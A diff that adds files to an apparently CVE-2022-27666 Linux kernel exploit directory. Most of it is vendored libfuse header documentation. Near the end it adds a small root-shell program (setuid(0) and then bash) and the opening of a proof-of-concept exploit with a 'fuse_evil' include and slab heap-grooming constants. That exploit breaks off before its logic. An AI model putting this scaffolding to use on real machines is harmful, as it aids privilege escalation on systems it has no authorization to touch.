+ * + * In case this method is not implemented, glibc falls back to reading + * data from the source and writing to the destination, effectively + * doing an inefficient copy of the data. + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure with error code EOPNOTSUPP, i.e. all + * future copy_file_range() requests will fail with EOPNOTSUPP without + * being sent to the filesystem process. + * + * Valid replies: + * fuse_reply_write + * fuse_reply_err + * + * @param req request handle + * @param ino_in the inode number of the source file + * @param off_in starting point from where the data should be read + * @param fi_in file information of the source file + * @param ino_out the inode number of the destination file + * @param off_out starting point where the data should be written + * @param fi_out file information of the destination file + * @param len maximum size of the data to copy + * @param flags passed along with the copy_file_range() syscall + */ + void (*copy_file_range) (fuse_req_t req, fuse_ino_t ino_in, + off_t off_in, struct fuse_file_info *fi_in, + fuse_ino_t ino_out, off_t off_out, + struct fuse_file_info *fi_out, size_t len, + int flags); + + /** + * Find next data or hole after the specified offset + * + * If this request is answered with an error code of ENOSYS, this is + * treated as a permanent failure, i.e. all future lseek() requests will + * fail with the same error code without being sent to the filesystem + * process. + * + * Valid replies: + * fuse_reply_lseek + * fuse_reply_err + * + * @param req request handle + * @param ino the inode number + * @param off offset to start search from + * @param whence either SEEK_DATA or SEEK_HOLE + * @param fi file information + */ + void (*lseek) (fuse_req_t req, fuse_ino_t ino, off_t off, int whence, + struct fuse_file_info *fi); +}; + +/** + * Reply with an error code or success.
+ * + * Possible requests: + * all except forget, forget_multi, retrieve_reply + * + * Wherever possible, error codes should be chosen from the list of + * documented error conditions in the corresponding system calls + * manpage. + * + * An error code of ENOSYS is sometimes treated specially. This is + * indicated in the documentation of the affected handler functions. + * + * The following requests may be answered with a zero error code: + * unlink, rmdir, rename, flush, release, fsync, fsyncdir, setxattr, + * removexattr, setlk. + * + * @param req request handle + * @param err the positive error value, or zero for success + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_err(fuse_req_t req, int err); + +/** + * Don't send reply + * + * Possible requests: + * forget + * forget_multi + * retrieve_reply + * + * @param req request handle + */ +void fuse_reply_none(fuse_req_t req); + +/** + * Reply with a directory entry + * + * Possible requests: + * lookup, mknod, mkdir, symlink, link + * + * Side effects: + * increments the lookup count on success + * + * @param req request handle + * @param e the entry parameters + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_entry(fuse_req_t req, const struct fuse_entry_param *e); + +/** + * Reply with a directory entry and open parameters + * + * currently the following members of 'fi' are used: + * fh, direct_io, keep_cache + * + * Possible requests: + * create + * + * Side effects: + * increments the lookup count on success + * + * @param req request handle + * @param e the entry parameters + * @param fi file information + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_create(fuse_req_t req, const struct fuse_entry_param *e, + const struct fuse_file_info *fi); + +/** + * Reply with attributes + * + * Possible requests: + * getattr, setattr + * + * @param req request handle + * @param attr the attributes + * @param 
attr_timeout validity timeout (in seconds) for the attributes + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_attr(fuse_req_t req, const struct stat *attr, + double attr_timeout); + +/** + * Reply with the contents of a symbolic link + * + * Possible requests: + * readlink + * + * @param req request handle + * @param link symbolic link contents + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_readlink(fuse_req_t req, const char *link); + +/** + * Reply with open parameters + * + * currently the following members of 'fi' are used: + * fh, direct_io, keep_cache + * + * Possible requests: + * open, opendir + * + * @param req request handle + * @param fi file information + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_open(fuse_req_t req, const struct fuse_file_info *fi); + +/** + * Reply with number of bytes written + * + * Possible requests: + * write + * + * @param req request handle + * @param count the number of bytes written + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_write(fuse_req_t req, size_t count); + +/** + * Reply with data + * + * Possible requests: + * read, readdir, getxattr, listxattr + * + * @param req request handle + * @param buf buffer containing data + * @param size the size of data in bytes + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_buf(fuse_req_t req, const char *buf, size_t size); + +/** + * Reply with data copied/moved from buffer(s) + * + * Zero copy data transfer ("splicing") will be used under + * the following circumstances: + * + * 1. FUSE_CAP_SPLICE_WRITE is set in fuse_conn_info.want, and + * 2. the kernel supports splicing from the fuse device + * (FUSE_CAP_SPLICE_WRITE is set in fuse_conn_info.capable), and + * 3. *flags* does not contain FUSE_BUF_NO_SPLICE + * 4. 
The amount of data that is provided in file-descriptor backed + * buffers (i.e., buffers for which bufv[n].flags == FUSE_BUF_FD) + * is at least twice the page size. + * + * In order for SPLICE_F_MOVE to be used, the following additional + * conditions have to be fulfilled: + * + * 1. FUSE_CAP_SPLICE_MOVE is set in fuse_conn_info.want, and + * 2. the kernel supports it (i.e., FUSE_CAP_SPLICE_MOVE is set in + * fuse_conn_info.capable), and + * 3. *flags* contains FUSE_BUF_SPLICE_MOVE + * + * Note that, if splice is used, the data is actually spliced twice: + * once into a temporary pipe (to prepend header data), and then again + * into the kernel. If some of the provided buffers are memory-backed, + * the data in them is copied in step one and spliced in step two. + * + * The FUSE_BUF_SPLICE_FORCE_SPLICE and FUSE_BUF_SPLICE_NONBLOCK flags + * are silently ignored. + * + * Possible requests: + * read, readdir, getxattr, listxattr + * + * Side effects: + * when used to return data from a readdirplus() (but not readdir()) + * call, increments the lookup count of each returned entry by one + * on success.
+ * + * @param req request handle + * @param bufv buffer vector + * @param flags flags controlling the copy + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_data(fuse_req_t req, struct fuse_bufvec *bufv, + enum fuse_buf_copy_flags flags); + +/** + * Reply with data vector + * + * Possible requests: + * read, readdir, getxattr, listxattr + * + * @param req request handle + * @param iov the vector containing the data + * @param count the size of vector + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_iov(fuse_req_t req, const struct iovec *iov, int count); + +/** + * Reply with filesystem statistics + * + * Possible requests: + * statfs + * + * @param req request handle + * @param stbuf filesystem statistics + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_statfs(fuse_req_t req, const struct statvfs *stbuf); + +/** + * Reply with needed buffer size + * + * Possible requests: + * getxattr, listxattr + * + * @param req request handle + * @param count the buffer size needed in bytes + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_xattr(fuse_req_t req, size_t count); + +/** + * Reply with file lock information + * + * Possible requests: + * getlk + * + * @param req request handle + * @param lock the lock information + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_lock(fuse_req_t req, const struct flock *lock); + +/** + * Reply with block index + * + * Possible requests: + * bmap + * + * @param req request handle + * @param idx block index within device + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_bmap(fuse_req_t req, uint64_t idx); + +/* ----------------------------------------------------------- * + * Filling a buffer in readdir * + * ----------------------------------------------------------- */ + +/** + * Add a directory entry to the buffer + * + * Buffer 
needs to be large enough to hold the entry. If it's not, + * then the entry is not filled in but the size of the entry is still + * returned. The caller can check this by comparing the bufsize + * parameter with the returned entry size. If the entry size is + * larger than the buffer size, the operation failed. + * + * From the 'stbuf' argument the st_ino field and bits 12-15 of the + * st_mode field are used. The other fields are ignored. + * + * *off* should be any non-zero value that the filesystem can use to + * identify the current point in the directory stream. It does not + * need to be the actual physical position. A value of zero is + * reserved to mean "from the beginning", and should therefore never + * be used (the first call to fuse_add_direntry should be passed the + * offset of the second directory entry). + * + * @param req request handle + * @param buf the point where the new entry will be added to the buffer + * @param bufsize remaining size of the buffer + * @param name the name of the entry + * @param stbuf the file attributes + * @param off the offset of the next entry + * @return the space needed for the entry + */ +size_t fuse_add_direntry(fuse_req_t req, char *buf, size_t bufsize, + const char *name, const struct stat *stbuf, + off_t off); + +/** + * Add a directory entry to the buffer with the attributes + * + * See documentation of `fuse_add_direntry()` for more details. + * + * @param req request handle + * @param buf the point where the new entry will be added to the buffer + * @param bufsize remaining size of the buffer + * @param name the name of the entry + * @param e the directory entry + * @param off the offset of the next entry + * @return the space needed for the entry + */ +size_t fuse_add_direntry_plus(fuse_req_t req, char *buf, size_t bufsize, + const char *name, + const struct fuse_entry_param *e, off_t off); + +/** + * Reply to ask for data fetch and output buffer preparation. 
ioctl + * will be retried with the specified input data fetched and output + * buffer prepared. + * + * Possible requests: + * ioctl + * + * @param req request handle + * @param in_iov iovec specifying data to fetch from the caller + * @param in_count number of entries in in_iov + * @param out_iov iovec specifying addresses to write output to + * @param out_count number of entries in out_iov + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_ioctl_retry(fuse_req_t req, + const struct iovec *in_iov, size_t in_count, + const struct iovec *out_iov, size_t out_count); + +/** + * Reply to finish ioctl + * + * Possible requests: + * ioctl + * + * @param req request handle + * @param result result to be passed to the caller + * @param buf buffer containing output data + * @param size length of output data + */ +int fuse_reply_ioctl(fuse_req_t req, int result, const void *buf, size_t size); + +/** + * Reply to finish ioctl with iov buffer + * + * Possible requests: + * ioctl + * + * @param req request handle + * @param result result to be passed to the caller + * @param iov the vector containing the data + * @param count the size of vector + */ +int fuse_reply_ioctl_iov(fuse_req_t req, int result, const struct iovec *iov, + int count); + +/** + * Reply with poll result event mask + * + * @param req request handle + * @param revents poll result event mask + */ +int fuse_reply_poll(fuse_req_t req, unsigned revents); + +/** + * Reply with offset + * + * Possible requests: + * lseek + * + * @param req request handle + * @param off offset of next data or hole + * @return zero for success, -errno for failure to send reply + */ +int fuse_reply_lseek(fuse_req_t req, off_t off); + +/* ----------------------------------------------------------- * + * Notification * + * ----------------------------------------------------------- */ + +/** + * Notify IO readiness event + * + * For more information, please read comment for poll operation. 
+ * + * @param ph poll handle to notify IO readiness event for + */ +int fuse_lowlevel_notify_poll(struct fuse_pollhandle *ph); + +/** + * Notify to invalidate cache for an inode. + * + * Added in FUSE protocol version 7.12. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. + * + * If the filesystem has writeback caching enabled, invalidating an + * inode will first trigger a writeback of all dirty pages. The call + * will block until all writeback requests have completed and the + * inode has been invalidated. It will, however, not wait for + * completion of pending writeback requests that have been issued + * before. + * + * If there are no dirty pages, this function will never block. + * + * @param se the session object + * @param ino the inode number + * @param off the offset in the inode where to start invalidating + * or negative to invalidate attributes only + * @param len the amount of cache to invalidate or 0 for all + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_inval_inode(struct fuse_session *se, fuse_ino_t ino, + off_t off, off_t len); + +/** + * Notify to invalidate parent attributes and the dentry matching + * parent/name + * + * To avoid a deadlock this function must not be called in the + * execution path of a related filesystem operation or within any code + * that could hold a lock that could be needed to execute such an + * operation. As of kernel 4.18, a "related operation" is a lookup(), + * symlink(), mknod(), mkdir(), unlink(), rename(), link() or create() + * request for the parent, and a setattr(), unlink(), rmdir(), + * rename(), setxattr(), removexattr(), readdir() or readdirplus() + * request for the inode itself. + * + * When called correctly, this function will never block. + * + * Added in FUSE protocol version 7.12. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing.
+ * + * @param se the session object + * @param parent inode number + * @param name file name + * @param namelen strlen() of file name + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_inval_entry(struct fuse_session *se, fuse_ino_t parent, + const char *name, size_t namelen); + +/** + * This function behaves like fuse_lowlevel_notify_inval_entry() with + * the following additional effect (at least as of Linux kernel 4.8): + * + * If the provided *child* inode matches the inode that is currently + * associated with the cached dentry, and if there are any inotify + * watches registered for the dentry, then the watchers are informed + * that the dentry has been deleted. + * + * To avoid a deadlock this function must not be called while + * executing a related filesystem operation or while holding a lock + * that could be needed to execute such an operation (see the + * description of fuse_lowlevel_notify_inval_entry() for more + * details). + * + * When called correctly, this function will never block. + * + * Added in FUSE protocol version 7.18. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. + * + * @param se the session object + * @param parent inode number + * @param child inode number + * @param name file name + * @param namelen strlen() of file name + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_delete(struct fuse_session *se, + fuse_ino_t parent, fuse_ino_t child, + const char *name, size_t namelen); + +/** + * Store data to the kernel buffers + * + * Synchronously store data in the kernel buffers belonging to the + * given inode. The stored data is marked up-to-date (no read will be + * performed against it, unless it's invalidated or evicted from the + * cache). + * + * If the stored data overflows the current file size, then the size + * is extended, similarly to a write(2) on the filesystem.
+ * + * If this function returns an error, then the store wasn't fully + * completed, but it may have been partially completed. + * + * Added in FUSE protocol version 7.15. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. + * + * @param se the session object + * @param ino the inode number + * @param offset the starting offset into the file to store to + * @param bufv buffer vector + * @param flags flags controlling the copy + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_store(struct fuse_session *se, fuse_ino_t ino, + off_t offset, struct fuse_bufvec *bufv, + enum fuse_buf_copy_flags flags); +/** + * Retrieve data from the kernel buffers + * + * Retrieve data in the kernel buffers belonging to the given inode. + * If successful then the retrieve_reply() method will be called with + * the returned data. + * + * Only present pages are returned in the retrieve reply. Retrieving + * stops when it finds a non-present page and only data prior to that + * is returned. + * + * If this function returns an error, then the retrieve will not be + * completed and no reply will be sent. + * + * This function doesn't change the dirty state of pages in the kernel + * buffer. For dirty pages the write() method will be called + * regardless of having been retrieved previously. + * + * Added in FUSE protocol version 7.15. If the kernel does not support + * this (or a newer) version, the function will return -ENOSYS and do + * nothing. 
+ * + * @param se the session object + * @param ino the inode number + * @param size the number of bytes to retrieve + * @param offset the starting offset into the file to retrieve from + * @param cookie user data to supply to the reply callback + * @return zero for success, -errno for failure + */ +int fuse_lowlevel_notify_retrieve(struct fuse_session *se, fuse_ino_t ino, + size_t size, off_t offset, void *cookie); + + +/* ----------------------------------------------------------- * + * Utility functions * + * ----------------------------------------------------------- */ + +/** + * Get the userdata from the request + * + * @param req request handle + * @return the user data passed to fuse_session_new() + */ +void *fuse_req_userdata(fuse_req_t req); + +/** + * Get the context from the request + * + * The pointer returned by this function will only be valid for the + * request's lifetime + * + * @param req request handle + * @return the context structure + */ +const struct fuse_ctx *fuse_req_ctx(fuse_req_t req); + +/** + * Get the current supplementary group IDs for the specified request + * + * Similar to the getgroups(2) system call, except the return value is + * always the total number of group IDs, even if it is larger than the + * specified size. + * + * The current fuse kernel module in linux (as of 2.6.30) doesn't pass + * the group list to userspace, hence this function needs to parse + * "/proc/$TID/task/$TID/status" to get the group IDs. + * + * This feature may not be supported on all operating systems. In + * such a case this function will return -ENOSYS. 
+ * + * @param req request handle + * @param size size of given array + * @param list array of group IDs to be filled in + * @return the total number of supplementary group IDs or -errno on failure + */ +int fuse_req_getgroups(fuse_req_t req, int size, gid_t list[]); + +/** + * Callback function for an interrupt + * + * @param req interrupted request + * @param data user data + */ +typedef void (*fuse_interrupt_func_t)(fuse_req_t req, void *data); + +/** + * Register/unregister callback for an interrupt + * + * If an interrupt has already happened, then the callback function is + * called from within this function, hence it's not possible for + * interrupts to be lost. + * + * @param req request handle + * @param func the callback function or NULL for unregister + * @param data user data passed to the callback function + */ +void fuse_req_interrupt_func(fuse_req_t req, fuse_interrupt_func_t func, + void *data); + +/** + * Check if a request has already been interrupted + * + * @param req request handle + * @return 1 if the request has been interrupted, 0 otherwise + */ +int fuse_req_interrupted(fuse_req_t req); + + +/* ----------------------------------------------------------- * + * Inquiry functions * + * ----------------------------------------------------------- */ + +/** + * Print low-level version information to stdout. + */ +void fuse_lowlevel_version(void); + +/** + * Print available low-level options to stdout. This is not an + * exhaustive list, but includes only those options that may be of + * interest to an end-user of a file system. + */ +void fuse_lowlevel_help(void); + +/** + * Print available options for `fuse_parse_cmdline()`. 
+ */ +void fuse_cmdline_help(void); + +/* ----------------------------------------------------------- * + * Filesystem setup & teardown * + * ----------------------------------------------------------- */ + +struct fuse_cmdline_opts { + int singlethread; + int foreground; + int debug; + int nodefault_subtype; + char *mountpoint; + int show_version; + int show_help; + int clone_fd; + unsigned int max_idle_threads; +}; + +/** + * Utility function to parse common options for simple file systems + * using the low-level API. A help text that describes the available + * options can be printed with `fuse_cmdline_help`. A single + * non-option argument is treated as the mountpoint. Multiple + * non-option arguments will result in an error. + * + * If neither the -o subtype= nor the -o fsname= option is given, a new + * subtype option will be added and set to the basename of the program + * (the fsname will remain unset, and then defaults to "fuse"). + * + * Known options will be removed from *args*, unknown options will + * remain. + * + * @param args argument vector (input+output) + * @param opts output argument for parsed options + * @return 0 on success, -1 on failure + */ +int fuse_parse_cmdline(struct fuse_args *args, + struct fuse_cmdline_opts *opts); + +/** + * Create a low level session. + * + * Returns a session structure suitable for passing to + * fuse_session_mount() and fuse_session_loop(). + * + * This function accepts most file-system independent mount options + * (like context, nodev, ro - see mount(8)), as well as the general + * fuse mount options listed in mount.fuse(8) (e.g. -o allow_root and + * -o default_permissions, but not ``-o use_ino``). Instead of `-o + * debug`, debugging may also be enabled with `-d` or `--debug`. + * + * If not all options are known, an error message is written to stderr + * and the function returns NULL. + * + * Option parsing skips argv[0], which is assumed to contain the + * program name.
To prevent accidentally passing an option in + * argv[0], this element must always be present (even if no options + * are specified). It may be set to the empty string ('\0') if no + * reasonable value can be provided. + * + * @param args argument vector + * @param op the (low-level) filesystem operations + * @param op_size sizeof(struct fuse_lowlevel_ops) + * @param userdata user data + * + * @return the fuse session on success, NULL on failure + **/ +struct fuse_session *fuse_session_new(struct fuse_args *args, + const struct fuse_lowlevel_ops *op, + size_t op_size, void *userdata); + +/** + * Mount a FUSE file system. + * + * @param mountpoint the mount point path + * @param se session object + * + * @return 0 on success, -1 on failure. + **/ +int fuse_session_mount(struct fuse_session *se, const char *mountpoint); + +/** + * Enter a single threaded, blocking event loop. + * + * When the event loop terminates because the connection to the FUSE + * kernel module has been closed, this function returns zero. This + * happens when the filesystem is unmounted regularly (by the + * filesystem owner or root running the umount(8) or fusermount(1) + * command), or if the connection is explicitly severed by writing ``1`` + * to the ``abort`` file in ``/sys/fs/fuse/connections/NNN``. The only + * way to distinguish between these two conditions is to check if the + * filesystem is still mounted after the session loop returns. + * + * When some error occurs during request processing, the function + * returns a negated errno(3) value. + * + * If the loop has been terminated because of a signal handler + * installed by fuse_set_signal_handlers(), this function returns the + * (positive) signal value that triggered the exit.
+ * + * @param se the session + * @return 0, -errno, or a signal value + */ +int fuse_session_loop(struct fuse_session *se); + +#if FUSE_USE_VERSION < 32 +int fuse_session_loop_mt_31(struct fuse_session *se, int clone_fd); +#define fuse_session_loop_mt(se, clone_fd) fuse_session_loop_mt_31(se, clone_fd) +#else +#if (!defined(__UCLIBC__) && !defined(__APPLE__)) +/** + * Enter a multi-threaded event loop. + * + * For a description of the return value and the conditions when the + * event loop exits, refer to the documentation of + * fuse_session_loop(). + * + * @param se the session + * @param config session loop configuration + * @return see fuse_session_loop() + */ +int fuse_session_loop_mt(struct fuse_session *se, struct fuse_loop_config *config); +#else +int fuse_session_loop_mt_32(struct fuse_session *se, struct fuse_loop_config *config); +#define fuse_session_loop_mt(se, config) fuse_session_loop_mt_32(se, config) +#endif +#endif + +/** + * Flag a session as terminated. + * + * This function is invoked by the POSIX signal handlers, when + * registered using fuse_set_signal_handlers(). It will cause any + * running event loops to terminate on the next opportunity. + * + * @param se the session + */ +void fuse_session_exit(struct fuse_session *se); + +/** + * Reset the terminated flag of a session + * + * @param se the session + */ +void fuse_session_reset(struct fuse_session *se); + +/** + * Query the terminated flag of a session + * + * @param se the session + * @return 1 if exited, 0 if not exited + */ +int fuse_session_exited(struct fuse_session *se); + +/** + * Ensure that the file system is unmounted. + * + * In regular operation, the file system is typically unmounted by the + * user calling umount(8) or fusermount(1), which then terminates the + * FUSE session loop. However, the session loop may also terminate as + * a result of an explicit call to fuse_session_exit() (e.g. by a + * signal handler installed by fuse_set_signal_handlers()).
In this + * case the filesystem remains mounted, but any attempt to access it + * will block (while the filesystem process is still running) or give + * an ESHUTDOWN error (after the filesystem process has terminated). + * + * If the communication channel with the FUSE kernel module is still + * open (i.e., if the session loop was terminated by an explicit call + * to fuse_session_exit()), this function will close it and unmount + * the filesystem. If the communication channel has been closed by the + * kernel, this method will do (almost) nothing. + * + * NOTE: The above semantics mean that if the connection to the kernel + * is terminated via the ``/sys/fs/fuse/connections/NNN/abort`` file, + * this method will *not* unmount the filesystem. + * + * @param se the session + */ +void fuse_session_unmount(struct fuse_session *se); + +/** + * Destroy a session + * + * @param se the session + */ +void fuse_session_destroy(struct fuse_session *se); + +/* ----------------------------------------------------------- * + * Custom event loop support * + * ----------------------------------------------------------- */ + +/** + * Return the file descriptor for communication with the kernel. + * + * The file descriptor can be used to integrate FUSE with a custom event + * loop. Whenever data is available for reading on the provided fd, + * the event loop should call `fuse_session_receive_buf` followed by + * `fuse_session_process_buf` to process the request. + * + * The returned file descriptor is valid until `fuse_session_unmount` + * is called. + * + * @param se the session + * @return a file descriptor + */ +int fuse_session_fd(struct fuse_session *se); + +/** + * Process a raw request supplied in a generic buffer + * + * The fuse_buf may contain a memory buffer or a pipe file descriptor.
+ * + * @param se the session + * @param buf the fuse_buf containing the request + */ +void fuse_session_process_buf(struct fuse_session *se, + const struct fuse_buf *buf); + +/** + * Read a raw request from the kernel into the supplied buffer. + * + * Depending on file system options, system capabilities, and request + * size the request is either read into a memory buffer or spliced + * into a temporary pipe. + * + * @param se the session + * @param buf the fuse_buf to store the request in + * @return the actual size of the raw request, or -errno on error + */ +int fuse_session_receive_buf(struct fuse_session *se, struct fuse_buf *buf); + +#ifdef __cplusplus +} +#endif + +#endif /* FUSE_LOWLEVEL_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_opt.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_opt.h new file mode 100644 index 0000000000000000000000000000000000000000..d8573e74fddca0647c1c73051258c8da565f4834 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_opt.h @@ -0,0 +1,271 @@ +/* + FUSE: Filesystem in Userspace + Copyright (C) 2001-2007 Miklos Szeredi + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +#ifndef FUSE_OPT_H_ +#define FUSE_OPT_H_ + +/** @file + * + * This file defines the option parsing interface of FUSE + */ + +#ifdef __cplusplus +extern "C" { +#endif + +/** + * Option description + * + * This structure describes a single option, and action associated + * with it, in case it matches. + * + * More than one such match may occur, in which case the action for + * each match is executed. 
+ * + * There are three possible actions in case of a match: + * + * i) An integer (int or unsigned) variable determined by 'offset' is + * set to 'value' + * + * ii) The processing function is called, with 'value' as the key + * + * iii) An integer (any) or string (char *) variable determined by + * 'offset' is set to the value of an option parameter + * + * 'offset' should normally be either set to + * + * - 'offsetof(struct foo, member)' actions i) and iii) + * + * - -1 action ii) + * + * The 'offsetof()' macro is defined in the standard stddef.h header. + * + * The template determines which options match, and also has an + * effect on the action. Normally the action is either i) or ii), but + * if a format is present in the template, then action iii) is + * performed. + * + * The types of templates are: + * + * 1) "-x", "-foo", "--foo", "--foo-bar", etc. These match only + * themselves. Invalid values are "--" and anything beginning + * with "-o" + * + * 2) "foo", "foo-bar", etc. These match "-ofoo", "-ofoo-bar" or + * the relevant option in a comma separated option list + * + * 3) "bar=", "--foo=", etc. These are variations of 1) and 2) + * which have a parameter + * + * 4) "bar=%s", "--foo=%lu", etc. Same matching as above but perform + * action iii). + * + * 5) "-x ", etc. Matches either "-xparam" or "-x param" as + * two separate arguments + * + * 6) "-x %s", etc. Combination of 4) and 5) + * + * If the format is "%s", memory is allocated for the string unlike with + * scanf(). The previous value (if non-NULL) stored at this location is + * freed. + */ +struct fuse_opt { + /** Matching template and optional parameter formatting */ + const char *templ; + + /** + * Offset of variable within 'data' parameter of fuse_opt_parse() + * or -1 + */ + unsigned long offset; + + /** + * Value to set the variable to, or to be passed as 'key' to the + * processing function. Ignored if template has a format + */ + int value; +}; + +/** + * Key option.
In case of a match, the processing function will be + * called with the specified key. + */ +#define FUSE_OPT_KEY(templ, key) { templ, -1U, key } + +/** + * Last option. An array of 'struct fuse_opt' must end with a NULL + * template value + */ +#define FUSE_OPT_END { NULL, 0, 0 } + +/** + * Argument list + */ +struct fuse_args { + /** Argument count */ + int argc; + + /** Argument vector. NULL terminated */ + char **argv; + + /** Is 'argv' allocated? */ + int allocated; +}; + +/** + * Initializer for 'struct fuse_args' + */ +#define FUSE_ARGS_INIT(argc, argv) { argc, argv, 0 } + +/** + * Key value passed to the processing function if an option did not + * match any template + */ +#define FUSE_OPT_KEY_OPT -1 + +/** + * Key value passed to the processing function for all non-options + * + * Non-options are the arguments beginning with a character other than + * '-' or all arguments after the special '--' option + */ +#define FUSE_OPT_KEY_NONOPT -2 + +/** + * Special key value for options to keep + * + * Argument is not passed to processing function, but it behaves as if the + * processing function returned 1 + */ +#define FUSE_OPT_KEY_KEEP -3 + +/** + * Special key value for options to discard + * + * Argument is not passed to processing function, but it behaves as if the + * processing function returned zero + */ +#define FUSE_OPT_KEY_DISCARD -4 + +/** + * Processing function + * + * This function is called if + * - option did not match any 'struct fuse_opt' + * - argument is a non-option + * - option did match and offset was set to -1 + * + * The 'arg' parameter will always contain the whole argument or + * option including the parameter if one exists. A two-argument option + * ("-x foo") is always converted to a single-argument option of the + * form "-xfoo" before this function is called. + * + * Options of the form '-ofoo' are passed to this function without the + * '-o' prefix.
+ * + * The return value of this function determines whether this argument + * is to be inserted into the output argument vector, or discarded. + * + * @param data is the user data passed to the fuse_opt_parse() function + * @param arg is the whole argument or option + * @param key determines why the processing function was called + * @param outargs the current output argument list + * @return -1 on error, 0 if arg is to be discarded, 1 if arg should be kept + */ +typedef int (*fuse_opt_proc_t)(void *data, const char *arg, int key, + struct fuse_args *outargs); + +/** + * Option parsing function + * + * If 'args' was returned from a previous call to fuse_opt_parse() or + * it was constructed from + * + * A NULL 'args' is equivalent to an empty argument vector + * + * A NULL 'opts' is equivalent to an 'opts' array containing a single + * end marker + * + * A NULL 'proc' is equivalent to a processing function always + * returning '1' + * + * @param args is the input and output argument list + * @param data is the user data + * @param opts is the option description array + * @param proc is the processing function + * @return -1 on error, 0 on success + */ +int fuse_opt_parse(struct fuse_args *args, void *data, + const struct fuse_opt opts[], fuse_opt_proc_t proc); + +/** + * Add an option to a comma separated option list + * + * @param opts is a pointer to an option list, may point to a NULL value + * @param opt is the option to add + * @return -1 on allocation error, 0 on success + */ +int fuse_opt_add_opt(char **opts, const char *opt); + +/** + * Add an option, escaping commas, to a comma separated option list + * + * @param opts is a pointer to an option list, may point to a NULL value + * @param opt is the option to add + * @return -1 on allocation error, 0 on success + */ +int fuse_opt_add_opt_escaped(char **opts, const char *opt); + +/** + * Add an argument to a NULL terminated argument vector + * + * @param args is the structure containing the current argument 
list + * @param arg is the new argument to add + * @return -1 on allocation error, 0 on success + */ +int fuse_opt_add_arg(struct fuse_args *args, const char *arg); + +/** + * Add an argument at the specified position in a NULL terminated + * argument vector + * + * Adds the argument to the N-th position. This is useful for adding + * options at the beginning of the array which must not come after the + * special '--' option. + * + * @param args is the structure containing the current argument list + * @param pos is the position at which to add the argument + * @param arg is the new argument to add + * @return -1 on allocation error, 0 on success + */ +int fuse_opt_insert_arg(struct fuse_args *args, int pos, const char *arg); + +/** + * Free the contents of argument list + * + * The structure itself is not freed + * + * @param args is the structure containing the argument list + */ +void fuse_opt_free_args(struct fuse_args *args); + + +/** + * Check if an option matches + * + * @param opts is the option description array + * @param opt is the option to match + * @return 1 if a match is found, 0 if not + */ +int fuse_opt_match(const struct fuse_opt opts[], const char *opt); + +#ifdef __cplusplus +} +#endif + +#endif /* FUSE_OPT_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/meson.build b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/meson.build new file mode 100644 index 0000000000000000000000000000000000000000..bf671977a5a6a9142bd67aceabd8a919e3d968d0 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/meson.build @@ -0,0 +1,4 @@ +libfuse_headers = [ 'fuse.h', 'fuse_common.h', 'fuse_lowlevel.h', + 'fuse_opt.h', 'cuse_lowlevel.h', 'fuse_log.h' ] + +install_headers(libfuse_headers, subdir: 'fuse3') diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse3.a b/cve/linux-kernel/2022/CVE-2022-27666/libfuse3.a new file mode 100644 index 0000000000000000000000000000000000000000..81aa0a40f969584d486cdaac87e33918a910be24 Binary files /dev/null 
and b/cve/linux-kernel/2022/CVE-2022-27666/libfuse3.a differ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/myshell.c b/cve/linux-kernel/2022/CVE-2022-27666/myshell.c new file mode 100644 index 0000000000000000000000000000000000000000..6151e43dc0235dc9addabdc8dd0df210ff225757 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/myshell.c @@ -0,0 +1,6 @@ +#include + +int main() { + setuid(0); + system("/bin/bash"); +} \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-27666/poc.c b/cve/linux-kernel/2022/CVE-2022-27666/poc.c new file mode 100644 index 0000000000000000000000000000000000000000..b0582f6ddb3cf5e3ec099bfa51df5f6b0a6bede5 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/poc.c @@ -0,0 +1,2215 @@ + + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include "fuse_evil.h" +#define SIOCETHTOOL 0x8946 +#define SLAB_32_OBJS_PER_SLAB 64 +#define SLAB_32_CPU_PARTIAL 30 +#define SLAB_1k_OBJS_PER_SLAB 32 +#define SLAB_1k_CPU_PARTIAL 6 +#define SLAB_2k_OBJS_PER_SLAB 16 +#define SLAB_2k_CPU_PARTIAL 6 +#define SLAB_4k_OBJS_PER_SLAB 8 